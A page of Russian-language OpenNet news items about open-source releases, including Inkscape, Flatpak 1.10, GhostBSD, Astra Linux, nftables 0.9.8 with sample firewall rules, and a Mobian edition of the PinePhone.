  2. OpenNews: Выпуск глобальной децентрализованной файловой системы IPFS 0.7
  3. OpenNews: Доступен GNUnet 0.12, фреймворк для построения защищённых P2P-сетей
  4. OpenNews: Выпуск децентрализованной торрент-системы Tribler 6.4 с поддержкой анонимизации
  5. OpenNews: WebTorrent, самодостаточный torrent-клиент, работающий внутри браузера
  6. OpenNews: Выпуск ZeroNet 0.7, платформы для создания децентрализованных сайтов
Обсуждение (57 +7) | Тип: Программы |


18.01 Выпуск редактора векторной графики Inkscape 1.0.2 и начало тестирования Inkscape 1.1 (103 +29)
  Доступно обновление свободного векторного графического редактора Inkscape 1.0.2. Редактор предоставляет гибкие инструменты для рисования и обеспечивает поддержку чтения и сохранения изображений в форматах SVG, OpenDocument Drawing, DXF, WMF, EMF, sk1, PDF, EPS, PostScript и PNG. Готовые сборки Inkscape подготовлены для Linux (AppImage, Snap, Flatpak), macOS и Windows.

При подготовке новой версии основное внимание было уделено повышению стабильности и устранению ошибок, в том числе решены проблемы при выводе текста и налажена нормальная работа инструмента "ластик". Улучшено формирование пакетов для macOS и повышена производительность при работе на данной платформе. Из реализованных новшеств отмечается появление в настройках опций для отмены масштабирования через клик средней кнопкой мыши и запрета поворота холста для отдельного документа или всех окон.

Одновременно началось альфа-тестирование нового значительного выпуска Inkscape 1.1, в котором появился экран приветствия запуска приложения, предлагающий базовые настройки, такие как тип холста, тема оформления и набор горячих клавиш, а также список недавно открытых файлов и шаблоны для создания документов определённого размера.

Среди других новшеств:

  • Интерфейс для поиска настроек по маске.
  • Всплывающий при нажатии "?" диалог для ввода команд, позволяющий вызвать различные функции без обращения к меню или нажатия горячих клавиш.
  • Режим просмотра с наложением контура (Outline Overlay), в котором одновременно показаны контуры и рисунок.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск редактора векторной графики Inkscape 1.0.1
  3. OpenNews: Выпуск редактора векторной графики Inkscape 1.0
  4. OpenNews: Выпуск векторного графического редактора sK1 2.0RC2
  5. OpenNews: Выпуск экспериментального векторного графического редактора VPaint 1.7
  6. OpenNews: Доступен Akira, новый векторный графический редактор для Linux
Обсуждение (103 +29) | Тип: Программы |


17.01 Релиз системы самодостаточных пакетов Flatpak 1.10.0 (155 +6)
  Опубликована новая стабильная ветка инструментария Flatpak 1.10, который предоставляет систему для сборки самодостаточных пакетов, не привязанных к конкретным дистрибутивам Linux и выполняемых в специальном контейнере, изолирующем приложение от остальной системы. Поддержка выполнения Flatpak-пакетов обеспечена для Arch Linux, CentOS, Debian, Fedora, Gentoo, Mageia, Linux Mint, Alt Linux и Ubuntu. Пакеты с Flatpak включены в репозиторий Fedora и поддерживаются в штатной программе управления приложениями GNOME.

Ключевые новшества в ветке Flatpak 1.10:

  • Реализована поддержка нового формата репозитория, позволяющего ускорить доставку обновлений и сократить размер загружаемых данных. Репозиторий основывается на технологии OSTree, в которой для идентификации содержимого используется индексный файл, который обновляется при каждом изменении. Размер индексного файла зависит от числа пакетов и поддерживаемых архитектур. Новый формат репозитория подразумевает разделение индексных файлов для разных архитектур, а также применение delta-обновлений для загрузки только частей индекса, изменившихся с прошлой версии репозитория. Применение инкрементальных обновлений позволило в 100 раз сократить трафик и сняло ограничения по поддержке во Flathub дополнительных архитектур. Например, во Flathub общий размер индекса в настоящее время составляет 6.6 МБ (1.8 МБ сжатый), варианта для архитектуры x86-64 - 2.7 МБ (554 КБ сжатый), а при обновлении с прошлой версии требуется загрузка всего 20 КБ.
  • Добавлена новая команда "flatpak pin" для закрепления runtime (не будет удаляться при отсутствии использующих его приложений). По умолчанию закрепление применяется для runtime, установленных явно, а не автоматически загруженных в числе зависимостей при установке приложения.
  • При общем обновлении ("flatpak update") или удалении отдельных приложений обеспечено автоматическое удаление неиспользуемых runtime, которые не закреплены и имеют истекшее время жизни.
  • Улучшено определение похожих путей приложений, например, "/org/gnome/sound-juicer" теперь сопоставляется с "org.gnome.SoundJuicer".
  • Добавлена поддержка нового стандарта на оформление файлов в os-release в контейнерах.
  • Добавлен профиль для tcsh.
  • При поиске зависимостей репозиторий устанавливаемого приложения теперь имеет более высокий приоритет, чем другие репозитории.
  • Повышена эффективность кэширования индекса репозитория в памяти.
  • Запрещено указание "--filesystem=/".
  • Добавлены новые API: flatpak_installation_list_pinned_refs, flatpak_transaction_set_disable_auto_pin, flatpak_transaction_set_include_unused_uninstall_ops, flatpak_transaction_operation_get_subpaths, flatpak_transaction_operation_get_requires_authentication.
  • Обеспечена совместимость с находящимся в разработке GCC 11.
  • Улучшено определение сокетов PulseAudio в нетиповых конфигурациях.
  • В sandbox-окружениях, в которых разрешён доступ к сети, открыт доступ к сокетам systemd-resolved, а также разрешено выполнение команд "--unset-env" и "--env=FOO=" для удаления или присвоения пустого значения переменным окружения.
  • При обновлении теперь вначале устанавливается новая версия приложения и только потом удаляется старая, т.е. сбой при установке теперь не приводит к пропаданию приложения.
  • Пользователю root разрешено обходить ограничения родительского контроля.

Напомним, что разработчикам приложений Flatpak даёт возможность упростить распространение своих программ, не входящих в штатные репозитории дистрибутивов за счет подготовки одного универсального контейнера без формирования отдельных сборок для каждого дистрибутива. Пользователям, заботящимся о безопасности, Flatpak позволяет выполнить вызывающее сомнение приложение в контейнере, предоставив доступ только к сетевым функциям и файлам пользователя, связанным с приложением. Пользователям, интересующимся новинками, Flatpak позволяет установить самые свежие тестовые и стабильные выпуски приложений без необходимости внесения изменений в систему. Например, в настоящее время Flatpak-пакеты уже собираются для LibreOffice, Midori, GIMP, Inkscape, Kdenlive, Steam, 0 A.D., Visual Studio Code, VLC, Slack, Skype, Telegram Desktop, Android Studio и т.д.

Для уменьшения размера пакета он включает лишь специфичные для приложения зависимости, а базовые системные и графические библиотеки (GTK, Qt, библиотеки GNOME и KDE и т.п.) оформлены в виде подключаемых типовых runtime-окружений. Ключевое отличие Flatpak от Snap заключается в том, что Snap использует компоненты окружения основной системы и изоляцию на основе фильтрации системных вызовов, в то время как Flatpak создаёт отдельный от системы контейнер и оперирует крупными runtime-наборами, предоставляя в качестве зависимостей не пакеты, а типовые системные окружения (например, все библиотеки, необходимые для работы программ GNOME или KDE).

Помимо типового системного окружения (runtime), устанавливаемого через специальный репозиторий, поставляются дополнительные зависимости (bundle), требуемые для работы приложения. В сумме runtime и bundle образуют начинку контейнера, при том, что runtime устанавливается отдельно и привязывается сразу к нескольким контейнерам, что позволяет обойтись без дублирования общих для контейнеров системных файлов. В одной системе может быть установлено несколько разных runtime (GNOME, KDE) или несколько версий одного runtime (GNOME 3.36, GNOME 3.38). Контейнер с приложением в качестве зависимости использует привязку только к определённому runtime, без учёта отдельных пакетов, из которых состоит runtime. Все недостающие элементы упаковываются непосредственно вместе с приложением. При формировании контейнера содержимое runtime монтируется как раздел /usr, а bundle монтируется в директорию /app.

Начинка runtime и контейнеров приложений формируется с использованием технологии OSTree, при которой образ атомарно обновляется из Git-подобного хранилища, позволяющего применять методы версионного контроля к компонентам дистрибутива (например, можно быстро откатить систему к прошлому состоянию). RPM-пакеты транслируются в репозиторий OSTree при помощи специальной прослойки rpm-ostree. Отдельная установка и обновление пакетов внутри рабочего окружения не поддерживается, система обновляется не на уровне отдельных компонентов, а целиком, атомарно меняя своё состояние. Предоставляются средства для инкрементального применения обновлений, избавляющие от необходимости полной замены образа при каждом обновлении.

Формируемое изолированное окружение полностью независимо от используемого дистрибутива и при надлежащих настройках пакета не имеет доступа к файлам и процессам пользователя или основной системы, не может напрямую обращаться к оборудованию, за исключением вывода через DRI, и обращений к сетевой подсистеме. Вывод графики и организация ввода реализованы при помощи протокола Wayland или через проброс сокета X11. Взаимодействие с внешней средой построено на основе системы обмена сообщениями DBus и специального API Portals.

Для изоляции используется прослойка Bubblewrap и традиционные для Linux технологии контейнерной виртуализации, основанные на использовании cgroups, пространств имён (namespaces), Seccomp и SELinux. Для вывода звука применяется PulseAudio. При этом изоляция может быть отключена, чем пользуются разработчики многих популярных пакетов для получения полного доступа к ФС и всем устройствам в системе.

  1. Главная ссылка к новости
  2. OpenNews: Релиз системы самодостаточных пакетов Flatpak 1.8.0
  3. OpenNews: Релиз системы самодостаточных пакетов Flatpak 1.6.0
  4. OpenNews: Критика Flatpak
  5. OpenNews: Уязвимость в snapd и flatpak, позволяющая обойти режим изоляции
  6. OpenNews: Уязвимость во Flatpak, позволяющая повысить привилегии в системе
Обсуждение (155 +6) | Тип: Программы |


17.01 Выпуск GhostBSD 21.01.15 (113 +16)
  Доступен релиз десктоп-ориентированного дистрибутива GhostBSD 21.01.15, построенного на базе FreeBSD и предлагающего пользовательское окружение MATE. По умолчанию в GhostBSD применяется система инициализации OpenRC и файловая система ZFS. Поддерживается как работа в Live-режиме, так и установка на жесткий диск (используется собственный инсталлятор ginstall, написанный на языке Python). Загрузочные образы сформированы для архитектуры x86_64 (2.5 ГБ).

В новой версии проведена чистка iso-образа, из которого для сокращения размера удалены LibreOffice и Telegram. Уменьшение размера iso-образа позволило обеспечить работу файловой системы ZFS в live-режиме с возможностью записи на компьютерах с 4 ГБ ОЗУ. Из установщика удалена опция для разбивки всего диска на один раздел с UFS. Решены проблемы в интерфейсе разбивки дисковых разделов. Добавлены настройки для запуска Linux-клиента Steam. Обновлены версии программ и драйверов.

Дополнительно можно отметить публикацию отчёта о развитии FreeBSD с октября по декабрь 2020 года. На OpenNet обзор на основе данного отчёта скорее всего появится в понедельник.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск OpenBSD 6.8
  3. OpenNews: Проект FreeBSD анонсировал переход на Git
  4. OpenNews: Выпуск GhostBSD 20.11
  5. OpenNews: Выпуск операционной системы MidnightBSD 2.0
  6. OpenNews: Релиз FreeBSD 12.2
Обсуждение (113 +16) | Тип: Программы |


17.01 Новая версия российского дистрибутива Astra Linux Common Edition 2.12.40 (336 –14)
  Компании ООО "РусБИТех-Астра" опубликовала выпуск дистрибутива Astra Linux Common Edition 2.12.40, построенного на пакетной базе Debian GNU/Linux 9 "Stretch" и поставляемого с собственным проприетарным рабочим столом Fly (интерактивная демонстрация) с компонентами, использующими библиотеку Qt. Для загрузки доступны iso-образ, бинарный репозиторий и исходные тексты пакетов. Дистрибутив распространяется в рамках лицензионного соглашения, которое накладывает ряд ограничений на пользователей, в частности, запрещены коммерческое использование, декомпиляция и дизассемблирование продукта. Для персональных некоммерческих целей дистрибутив может использоваться бесплатно.

Основные изменения:

  • Добавлены пакеты с ядром Linux 5.4 (ранее предлагалось ядро 4.15), в котором появился драйвер eхFAT и улучшена поддержка процессоров 10 поколения от Intel и AMD, GPU-драйверов и сетевых компонентов. Обновлён образ инсталляционного диска с новым ядром.
  • Предложены две новые цветовые схемы оформления: светлая и тёмная (fly-data).
  • Переработано оформление диалога «Завершение работы» (fly-shutdown-dialog).
  • В новое оформление интерфейса входа в систему (fly-qdm) добавлена поддержка доменов и токенов.
  • Добавлен пакет laptop-mode-tools для управления энергосбережением и питанием ноутбуков.
  • В оконном менеджере fly-wm улучшена работа с мультимониторными конфигурациями. Оптимизировано размещение кнопок приложений при нехватке места на панели задач (с возможностью пролистывания рядов).
  • В файловом менеджере (fly-fm) добавлена поддержка приложений, использующих плагины KDE (действия "отправить" из KDE), ускорена работа с SMB ресурсами.
  • Во fly-reflex обеспечен вызов из всплывающего окна диалога форматирования внешнего накопителя.
  • Обновлён виджет даты и часов (fly-admin-date), добавлена интеграция с приложением fly-admin-time.
  • Добавлена горячая клавиша Win+F11, по которой любое приложение распахивается на полный экран без декораций и перекрывая панель задач.
  • Во fly-notify-prevlogin доступна информация о времени предыдущего входа в систему.
  • Обновлён виджет управления яркостью экрана (fly-brightness).
  • Добавлена переменная окружения FLY_SHARED_DESKTOP_DIR (/usr/share/fly-wm/ shareddesktop) для централизованного размещения ярлыков на рабочие столы всех пользователей.
  • Реализованы новые графические интерфейсы:
    • fly-admin-format для форматирования USB дисков, с поддержкой быстрого и полного режимов.
    • fly-admin-usbip для настройки монтирования usb-устройств по сети (usbip).
    • fly-admin-multiseat для настройки одновременной работы нескольких сотрудников с разделяемыми профилями на одном ПК.
    • fly-csp-cryptopro (ранее fly-csp) для создания и проверки электронной подписи провайдера КриптоПро.
    • fly-admin-time для выбора серверов NTP и настройки служб синхронизации времени.
  • Улучшены графические интерфейсы:
    • Во fly-admin-int-check добавлена возможность включать конкретные каталоги в перечень исключаемых из проверки на целостность.
    • Во fly-admin-ltsp включена возможность перенастройки dnsmasq, улучшена функция настройки автомонтирования USB-носителей и удалённого подключения.
    • Во fly-admin-smc для графического киоска реализована возможность отключения режима энергосбережения и блокировки экрана.
    • Во fly-admin-printer улучшен поиск драйверов hplip, что позволяет точнее определить модель принтера Hewlett Packard и выбирать корректный драйвер.
    • Во fly-admin-repo реализовано автоопределение имени, архитектуры и компонентов создаваемого репозитория, добавлена возможность подписи репозитория apt.
    • Во fly-admin-winprops включены опции окна "не показывать в трее" и "принудительные декорации" (актуально для GTK3 приложений), а также старт "в полноэкранном режиме".
    • В kcalc, компактном калькуляторе, реализован более привычный пользователям формат.
  • Обновлены версии пакетов: nvidia 450, osync 0.0.1, hwinfo 21.38, firefox 83.0, thunderbird 78.5.1, сhromium 86, firejail 0.9.58, cups 2.2.13, hplip 3.20.9, libreoffice 6.4.6, mesa 20.1.7, qmmp 1.4.2, kde-spectacle 2.12 (с возможностью редактирования скриншотов), bleachbit 3.9, samba 4.12.

  1. Главная ссылка к новости
  2. OpenNews: Группа компаний Astra Linux намерена инвестировать 3 млрд руб. в экосистему Linux
  3. OpenNews: Новая версия российского дистрибутива Astra Linux Common Edition 2.12.29
  4. OpenNews: Готовится версия Astra Linux для смартфонов
  5. OpenNews: Дистрибутив Astra Linux адаптирован для процессоров Эльбрус
  6. OpenNews: Astra Linux и ПараТайп представили открытые шрифты PT Astra Sans и PT Astra Serif
Обсуждение (336 –14) | Тип: Программы |


16.01 Выпуск пакетных фильтров nftables 0.9.8 и iptables 1.8.7 (162 +16)
  Опубликован выпуск пакетного фильтра nftables 0.9.8, развивающегося в качестве замены iptables, ip6table, arptables и ebtables за счёт унификации интерфейсов фильтрации пакетов для IPv4, IPv6, ARP и сетевых мостов. В пакет nftables входят компоненты пакетного фильтра, работающие в пространстве пользователя, в то время как на уровне ядра работу обеспечивает подсистема nf_tables, входящая в состав ядра Linux начиная с выпуска 3.13. Необходимые для работы выпуска nftables 0.9.8 изменения включены в состав ядра Linux 5.11-rc1.

На уровне ядра предоставляется лишь общий интерфейс, не зависящий от конкретного протокола и предоставляющий базовые функции извлечения данных из пакетов, выполнения операций с данными и управления потоком. Непосредственно правила фильтрации и специфичные для протоколов обработчики компилируются в байткод в пространстве пользователя, после чего данный байткод загружается в ядро при помощи интерфейса Netlink и выполняется в ядре в специальной виртуальной машине, напоминающей BPF (Berkeley Packet Filters). Подобный подход позволяет значительно сократить размер кода фильтрации, работающего на уровне ядра и вынести все функции разбора правил и логики работы с протоколами в пространство пользователя.

Основные новшества:

  • Появилась полноценная поддержка проверки содержимого полей в заголовках ICMP-пакетов.
    
       ... icmp type { echo-reply, echo-request} icmp id 1 icmp sequence 2
       ... icmpv6 type packet-too-big icmpv6 mtu 1280
    
  • Добавлена возможность сопоставления с использованием сырых значений опций TCP, выделяемых в формате "@kind,offset,length".
    
       ... tcp option @42,16,4
    
  • Добавлена возможность проверки наличия в пакете любых опций TCP.
    
       ... tcp option 42 exists
    
  • Предоставлена возможность отклонения трафика из цепочки "ingress", обрабатываемой на том же уровне, что ingress-обработчик в цепочке netdev (hook ingress), т.е. на стадии когда драйвер передаёт пакет сетевому стеку ядра.
    
         table netdev x {
             chain y {
                   type filter hook ingress device eth0 priority 0; policy accept;
                   tcp dport 22 reject with tcp reset
             }
         }
    
  • Проведена оптимизация генерации байткода для сопоставления префиксов. Например, в результате для следующего правила будет сгенерированы две инструкции место трёх:
    
       # nft --debug=netlink x y ip saddr 192.168.2.0/24
       ip
         [ payload load 3b @ network header + 12 => reg 1 ]
         [ cmp eq reg 1 0x0002a8c0 ]
    
  • Добавлена возможность указания нескольких выражений для каждого элемента set-списков. Необходимая функциональность появилась начиная с ядра Linux 5.11-rc1. Например, в примере ниже для динамического списка в выражении фигурирует ratelimit и число пакетов для каждого элемента списка:
    
      table ip x {
           set y {
                   type ipv4_addr
                   size 65535
                   flags dynamic,timeout
                   timeout 1h
           }
    
           chain z {
                   type filter hook output priority filter; policy accept;
                   update @y { ip daddr limit rate 1/second counter }
           }
      }
    

    Также допускается использование комбинированных выражений со статически определяемыми set-списками:

    
       table ip x {
           set y {
                   type ipv4_addr
                   limit rate 1/second counter
                   elements = { 1.1.1.1, 4.4.4.4, 5.5.5.5 }
           }
    
           chain y {
                   type filter hook output priority filter; policy accept;
                   ip daddr @y
           }
      }
    

    В данном примере выражения с ratelimit и счётчиком будут запущены при добавлении нового элемента в список, например, через "nft add element x y { 6.6.6.6 }".

  • В CLI-интерфейс "nft -i" добавлена поддержка редактирования командной строки при помощи библиотеки editline вместо readline. Для работы требуется сборка с опцией "./configure --with-cli=editline".

Дополнительно доступен новый выпуск классического инструментария для управления пакетным фильтром iptables 1.8.7, развитие которого в основном сосредоточено на компонентах iptables-nft и ebtables-nft, предоставляющих утилиты с тем же синтаксисом командной строки, как в iptables и ebtables, но транслирующих полученные правила в байткод nf_tables. В iptables-nft повышена производительность сопоставлений префиксов IP- и MAC-адресов и обеспечен вывод дампов правил в цепочках, определённых пользователем, в неизменном лексическом порядке. В ebtables-nft устранена неработоспособность переименования пользовательских цепочек. Переработан и унифицирован код парсинга MAC-адресов.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск пакетного фильтра nftables 0.9.7
  3. OpenNews: В Ubuntu 20.10 планируют перейти с iptables на nftables
  4. OpenNews: В Debian 11 предлагается по умолчанию задействовать nftables и firewalld
  5. OpenNews: Разработчики Netfilter официально объявили инструментарий iptables устаревшим
  6. OpenNews: Релиз iptables 1.8.0
Обсуждение (162 +16) | Тип: Программы |


16.01 Представлена редакция смартфона PinePhone с дистрибутивом Mobian (209 +40)
  Сообщество Pine64 представило редакцию смартфона PinePhone Mobian Community Edition, поставляемую с прошивкой на базе дистрибутива Mobian, развивающего вариант Debian GNU/Linux для мобильных устройств. Окружение включает основанную на технологиях GNOME пользовательскую оболочку Phosh, развиваемую компанией Purism для смартфона Librem 5. Для отрисовки используется композитный сервер Phoc, работающий поверх Wayland.

Новая редакция смартфона поступит в продажу 18 января и будет поставляться в вариантах за 149 долларов (2GB ОЗУ + 16GB eMMC) и 199 долларов (3GB ОЗУ + 32GB eMMC + переходник USB Type-C для подключения к монитору, сети, клавиатуре и мыши (HDMI, 10/100 Ethernet и два порта USB 2.0)). Редакция с Mobian дополнит ранее выпускаемые варианты смартфона PinePhone, поставляемые с postmarketOS, KDE Plasma Mobile, UBports/Ubuntu Touch и Manjaro.

Из базовых приложений можно отметить просмотрщик документов Evince, текстовый редактор GEdit, просмотрщик изображений Eye of Gnome, менеджер установки приложений GNOME Software, систему заметок GNOME ToDo, интерфейс для настройки GSM/CDMA/UMTS/EVDO/LTE-модемов ModemManager, адресную книгу GNOME Contacts, программу записи звука GNOME Sound Recorder, конфигуратор GNOME Control Center, программу мониторинга GNOME Usage, почтовый клиент Geary, мессенджер Fractal (на базе протокола Matrix). Для управления телефонными вызовами задействован интерфейс Calls, в котором используется телефонный стек oFono. Приложения собраны с библиотекой виджетов libhandy и патчами от проекта Purism, нацеленными на улучшение работы интерфейса на небольших экранах. Возможна установка любых пакетов из репозиториев Debian.

Напомним, что аппаратная начинка PinePhone рассчитана на использование заменяемых компонентов - большинство модулей не впаяно, а подключено через отсоединяемые шлейфы, что позволяет, например, при желании заменить предлагаемую по умолчанию посредственную камеру на более качественную. Устройство построено на четырёхъядерном SoC ARM Allwinner A64 c GPU Mali 400 MP2, оснащено 2 или 3 ГБ ОЗУ, 5.95-дюймовым экраном (1440×720 IPS), Micro SD (с поддержкой загрузки с SD-карты), 16 или 32 ГБ eMMC (внутренний), портом USB-C с USB Host и совмещённым видеовыходом для подключения монитора, 3.5 мм mini-jack, Wi-Fi 802.11 b/g/n, Bluetooth 4.0 (A2DP), GPS, GPS-A, GLONASS, двумя камерами (2 и 5Mpx), съёмным аккумулятором 3000mAh, аппаратно отключаемыми компонентами с LTE/GNSS, WiFi, микрофоном и динамиками.

Из связанных с проектом PinePhone изменений также можно отметить публикацию тестового варианта прошивки на базе дистрибутива OpenMandriva Lx 4.2 с пользовательской оболочкой KDE Plasma Mobile и свежим ядром Linux 5.10. Кроме OpenMandriva Lx и Mobian, для PinePhone развиваются загрузочные образы на базе postmarketOS, KDE Plasma Mobile, UBports, Maemo Leste, Manjaro, LuneOS, Nemo Mobile и частично открытой платформой Sailfish. Ведётся работа по подготовке сборок с NixOS. Программное окружение может быть загружено прямо с SD-карты без необходимости осуществлять перепрошивку.

  1. Главная ссылка к новости
  2. OpenNews: Mobian - проект по адаптации Debian для мобильных устройств
  3. OpenNews: Редакция смартфона PinePhone с postmarketOS доступна для заказа
  4. OpenNews: Проект GloDroid развивает редакцию Android 10 для PinePhone, Orange Pi и Raspberry Pi
  5. OpenNews: Представлена редакция смартфона PinePhone с KDE Plasma Mobile
  6. OpenNews: Для PinePhone подготовлена универсальная сборка с 13 дистрибутивами
Обсуждение (209 +40) | Тип: К сведению |


Следующая страница (раньше) >>



Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2021 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру